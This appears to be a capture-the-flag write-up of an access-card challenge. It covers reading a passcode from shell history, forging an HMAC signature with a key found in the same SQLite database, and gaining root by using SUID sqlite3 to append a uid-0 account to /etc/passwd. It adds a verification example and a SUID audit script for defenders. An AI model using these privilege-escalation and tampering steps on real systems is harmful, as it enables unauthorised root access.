This is the second part of the Hardware Hacking 101 objective.
Hidden in Plain Sight Hints: It is so important to keep sensitive data like passwords secure. Oftentimes, when typing passwords into a CLI (Command Line Interface) they get added to log files and other easy to access locations. It makes it trivial to step back in history and identify the password.
We boot the system (‘Startup system default’). First, let's take a look at the command line history:
slh@slhconsole> history
1 cd /var/www/html
...
10 slg --config
11 slh --passcode CandyCaneCrunch77 --set-access 1 --id 143
We can also use the password from that previous session:
slh@slhconsole> slh --passcode CandyCaneCrunch77 --set-access 1 --id 42
...
Card 42 granted access level 1.
There’s a tougher route if you're up for the challenge to earn the Gold medal. It involves directly modifying the database and generating your own HMAC signature.
It's In the Signature Hints: I seem to remember there being a handy HMAC generator included in CyberChef.
We find the SQLite database in the file system and take a closer look at it:
slh@slhconsole> ls
access_cards
slh@slhconsole> file access_cards
access_cards: SQLite 3.x database, last written using SQLite version 3040001, file counter 8, database pages 32, cookie 0x2, schema 4, UTF-8, version-valid-for 8
slh@slhconsole> sqlite3 access_cards
sqlite> .header on
sqlite> .tables
access_cards config
sqlite> select * from config;
1|hmac_secret|9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e
2|hmac_message_format|{access}{uuid}
3|admin_password|3a40ae3f3fd57b2a4513cca783609589dbe51ce5e69739a33141c5717c20c9c1
4|app_version|1.0
sqlite> select * from access_cards where id=42;
id|uuid|access|sig
42|c06018b6-5e80-4395-ab71-ae5124560189|0|ecb9de15a057305e5887502d46d434c9394f5ed7ef1a51d2930ad786b02f6ffd
An HMAC (hash-based message authentication code) combines a cryptographic hash function with a secret key. It lets a verifier check both the integrity and the authenticity of a message, but only as long as the key stays secret; here the key sits in the same database as the signatures it protects.
If we use the value of hmac_secret as the key and build the message from the format {access}{uuid} (the new access value followed immediately by the card's uuid, without the braces), CyberChef's HMAC operation produces a valid signature for the modified row.
sqlite> update access_cards set access=1, sig='135a32d5026c5628b1753e6c67015c0f04e26051ef7391c2552de2816b1b7096' where id = 42;
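To make the signing and verification concrete, here is an added Python example (not code from the challenge or from the writeup) that recomputes a card signature from the hmac_secret and hmac_message_format values shown above and verifies it the way the access system should on every read. It assumes the hash is SHA-256 (the stored signatures are 64 hex characters) and, because the page does not say whether the secret was entered into CyberChef as raw hex bytes or as ASCII text, it tries both key encodings; the card row is the one copied from the page before the update.

```python
import hmac
import hashlib

# Values copied from the config table on the page.
HMAC_SECRET_HEX = "9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e"
HMAC_MESSAGE_FORMAT = "{access}{uuid}"

# Card row copied from the page (state before the update statement).
CARD_42 = {
    "id": 42,
    "uuid": "c06018b6-5e80-4395-ab71-ae5124560189",
    "access": 0,
    "sig": "ecb9de15a057305e5887502d46d434c9394f5ed7ef1a51d2930ad786b02f6ffd",
}

# Assumption: SHA-256 is the hash, and the secret may be used either as the
# 32 raw bytes the hex string encodes or as the 64-character ASCII text.
# The page does not state which CyberChef key setting was used, so both are tried.
KEY_ENCODINGS = {
    "hex-bytes": bytes.fromhex(HMAC_SECRET_HEX),
    "ascii-text": HMAC_SECRET_HEX.encode("ascii"),
}


def build_message(access: int, uuid: str) -> str:
    """Render the signed message exactly as hmac_message_format describes."""
    return HMAC_MESSAGE_FORMAT.format(access=access, uuid=uuid)


def sign_card(access: int, uuid: str, key: bytes) -> str:
    """HMAC-SHA256 over the formatted message, returned as lowercase hex."""
    msg = build_message(access, uuid).encode("ascii")
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def verify_card(row: dict, key: bytes) -> bool:
    """What the access system should do on every read: recompute and compare.

    compare_digest avoids leaking where the two strings first differ."""
    expected = sign_card(row["access"], row["uuid"], key)
    return hmac.compare_digest(expected, row["sig"])


def matching_key_encodings(row: dict) -> list:
    """Names of the key encodings under which the row's stored sig verifies."""
    return [name for name, key in KEY_ENCODINGS.items() if verify_card(row, key)]


def tampered_row(row: dict, new_access: int) -> dict:
    """Change the access level but keep the old signature, as a naive DB edit would."""
    return {**row, "access": new_access}


if __name__ == "__main__":
    print("card 42 verifies under:", matching_key_encodings(CARD_42))
    for name, key in KEY_ENCODINGS.items():
        print(f"{name}: sig for access=1 -> {sign_card(1, CARD_42['uuid'], key)}")
    # A row whose access level was edited without re-signing must fail.
    print("tampered row verifies under:", matching_key_encodings(tampered_row(CARD_42, 1)))
```

The design point for defenders is in the last two lines: editing access without re-signing is caught, but only because the verifier holds the key. Storing hmac_secret and hmac_message_format in the same database as the rows means anyone with read access to the file can re-sign whatever they change, so the key belongs in the verifying service, not in the data it protects.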
Brilliant work! We now have access to… the Wish List! I couldn't have done it without you—thank you so much!
I found a way to completely root the machine. It relies on sqlite3 being installed with the SUID bit set (see GTFOBins): the .output command writes query results to an arbitrary file, so we can append a new uid 0 entry to /etc/passwd and switch to it for root access.
slh@slhconsole> LFILE=/etc/passwd
slh@slhconsole> sqlite3 /dev/null -cmd ".output $LFILE" 'select "user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash";'
slh@slhconsole> su user3
(password: 123)
Password:
bash: cannot set terminal process group (9): Inappropriate ioctl for device
bash: no job control in this shell
user3@1a0597267c1e:/home/slh# id -a
uid=0(user3) gid=0(root) groups=0(root)
user3@1a0597267c1e:/home/slh#
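The privilege escalation above works only because sqlite3 carries the SUID bit. As an added example (not part of the writeup or the challenge), this POSIX shell audit helper lists SUID files under a directory and flags those whose names appear in a constructed short list of tools that GTFOBins documents as able to read or write arbitrary files when SUID, then removes the bit; the list of names and the directory to scan are assumptions to adapt per host.

```shell
#!/bin/sh
# Added audit helper, not from the page. RISKY_SUID_NAMES is a constructed
# subset of binaries GTFOBins lists as file-read/write capable under SUID.
RISKY_SUID_NAMES="sqlite3 python3 perl vim find bash"

# Print every regular file under $1 that has the SUID bit set (same filesystem only).
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Emit "<path> <basename>" for each SUID file whose basename is in RISKY_SUID_NAMES.
flag_risky_suid() {
    list_suid "$1" | while IFS= read -r path; do
        name=$(basename "$path")
        for risky in $RISKY_SUID_NAMES; do
            if [ "$name" = "$risky" ]; then
                printf '%s %s\n' "$path" "$name"
            fi
        done
    done
}

# Remediation: drop the SUID bit from a flagged file (needs root on a real host).
remove_suid() {
    chmod u-s "$1"
}

# Typical use: flag_risky_suid / | while read -r path name; do remove_suid "$path"; done
```

On the challenge box the hit would have been /usr/bin/sqlite3 (or wherever the binary lives); the fix is the chmod, plus the obvious follow-up of checking whether /etc/passwd already contains entries with uid 0 that are not root.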